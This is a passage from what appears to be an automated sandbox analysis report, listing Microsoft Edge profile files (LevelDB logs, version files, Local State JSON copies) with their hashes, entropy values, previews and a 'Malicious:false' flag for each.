                                                                                                                                                                                                                                                                                                Preview:A..r.................20_1_1...1.,U.................20_1_1...1...0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=.................;...............#38_h.......6.Z..W.F..........................V.e................V.e................V.e................6..Q0................39_config..........6.....n ....1

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.229010622616941
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4su4q2PcNwi23oH+TcwtfrK+IFUtL4suJZmwl4suDkwOcNwi23oH+TcwtfrUQ:7p4T4vLZYeb23FUtL4TJ/l4TD54ZYeb5
                                                                                                                                                                                                                                                                                                MD5:A2BADC450C5E79E34F500A0E7420BB90
                                                                                                                                                                                                                                                                                                SHA1:347E4CDF8A91315DEFDB25A4A915B9945B435F22
                                                                                                                                                                                                                                                                                                SHA-256:32335ECC5F9979A19D175FABF9D471FF0FF0FE5A695B1B3295721B8EA2675813
                                                                                                                                                                                                                                                                                                SHA-512:9B67F56CF1A2FC25F93E906636DE099E9CC9D1F49C453C40ED00D461BC2F957117F4DA3CE498D4BA5E7C8DB48F2E55DCC485104053A654A7C54966CD2303E65F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.584 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/07-07:19:03.584 13f0 Recovering log #3.2025/01/07-07:19:03.584 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.229010622616941
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp4su4q2PcNwi23oH+TcwtfrK+IFUtL4suJZmwl4suDkwOcNwi23oH+TcwtfrUQ:7p4T4vLZYeb23FUtL4TJ/l4TD54ZYeb5
                                                                                                                                                                                                                                                                                                MD5:A2BADC450C5E79E34F500A0E7420BB90
                                                                                                                                                                                                                                                                                                SHA1:347E4CDF8A91315DEFDB25A4A915B9945B435F22
                                                                                                                                                                                                                                                                                                SHA-256:32335ECC5F9979A19D175FABF9D471FF0FF0FE5A695B1B3295721B8EA2675813
                                                                                                                                                                                                                                                                                                SHA-512:9B67F56CF1A2FC25F93E906636DE099E9CC9D1F49C453C40ED00D461BC2F957117F4DA3CE498D4BA5E7C8DB48F2E55DCC485104053A654A7C54966CD2303E65F
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.584 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/01/07-07:19:03.584 13f0 Recovering log #3.2025/01/07-07:19:03.584 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):782
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.049291162962452
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ys:G0nYUtypD32m3yWlIZMBA5NgKIvB8s
                                                                                                                                                                                                                                                                                                MD5:FDF465758A7489458B387EB41C7D42B0
                                                                                                                                                                                                                                                                                                SHA1:9509283CF1BD7397790091C5A7580CBA353A1143
                                                                                                                                                                                                                                                                                                SHA-256:C5A7592A847D101DCB71AEE0A234835548121C647E6D99EF794337823A347703
                                                                                                                                                                                                                                                                                                SHA-512:9E40B768990B3FAC6960274C5C78F9B86585100DBFE92BC885FC5384937F2922C3ED435B44C42DEAC138E8FB22CD1EED865DBB984CFFDAE8ED0BE96EDADA1698
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.18675369307085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp40v4q2PcNwi23oH+TcwtfrzAdIFUtL40vJZmwl4MZDDkwOcNwi23oH+Tcwtfa:7p4+4vLZYeb9FUtL4+J/l4cD54ZYeb2J
                                                                                                                                                                                                                                                                                                MD5:3CFA6642595272080FA5CFEFC7E2C3B7
                                                                                                                                                                                                                                                                                                SHA1:91C3B9A70FF07EAB0272AFA4D1CB150C797B78DA
                                                                                                                                                                                                                                                                                                SHA-256:B96A732D54C5E41339A743D3FB782E551D5EB89DACAE6438F2FD016016C19AE9
                                                                                                                                                                                                                                                                                                SHA-512:3A18C96C8A621FBE233E820FB1CF22A8D1FF3E25C497D73FFF77207C2774585B389F7D2884F48C4167358EC3EE3E641ACB699963E34F79DD79FBE7B776EB32BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.569 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/07-07:19:03.569 13f0 Recovering log #3.2025/01/07-07:19:03.570 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):348
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.18675369307085
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOp40v4q2PcNwi23oH+TcwtfrzAdIFUtL40vJZmwl4MZDDkwOcNwi23oH+Tcwtfa:7p4+4vLZYeb9FUtL4+J/l4cD54ZYeb2J
                                                                                                                                                                                                                                                                                                MD5:3CFA6642595272080FA5CFEFC7E2C3B7
                                                                                                                                                                                                                                                                                                SHA1:91C3B9A70FF07EAB0272AFA4D1CB150C797B78DA
                                                                                                                                                                                                                                                                                                SHA-256:B96A732D54C5E41339A743D3FB782E551D5EB89DACAE6438F2FD016016C19AE9
                                                                                                                                                                                                                                                                                                SHA-512:3A18C96C8A621FBE233E820FB1CF22A8D1FF3E25C497D73FFF77207C2774585B389F7D2884F48C4167358EC3EE3E641ACB699963E34F79DD79FBE7B776EB32BC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/01/07-07:19:03.569 13f0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/01/07-07:19:03.569 13f0 Recovering log #3.2025/01/07-07:19:03.570 13f0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):120
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):13
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d3ff.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d48c.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d5c4.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2fcc5.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e6c7.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44236
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.089522781425741
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kyTKKGf4SQtBF1OIlPsm7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yn8t5b7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:3038A8D0E05710A868327285F7F0C658
                                                                                                                                                                                                                                                                                                SHA1:68ED80B00ADDBD5F9D4F9C2264580A9C5B4FE6BB
                                                                                                                                                                                                                                                                                                SHA-256:85FB1EBB5B597609ED3A709AC1F3E106A07FF5474F3FD42C887BCD331F79F560
                                                                                                                                                                                                                                                                                                SHA-512:55B71CFCFF528EB434F0642FD2FAE21283CD077B5D11A2C3C8210D4F175763971257209E588311D5CF1A15B5D7955C8A4F64606D988C3E469F328F37D8E3F5AF
                                                                                                                                                                                                                                                                                                Malicious:false
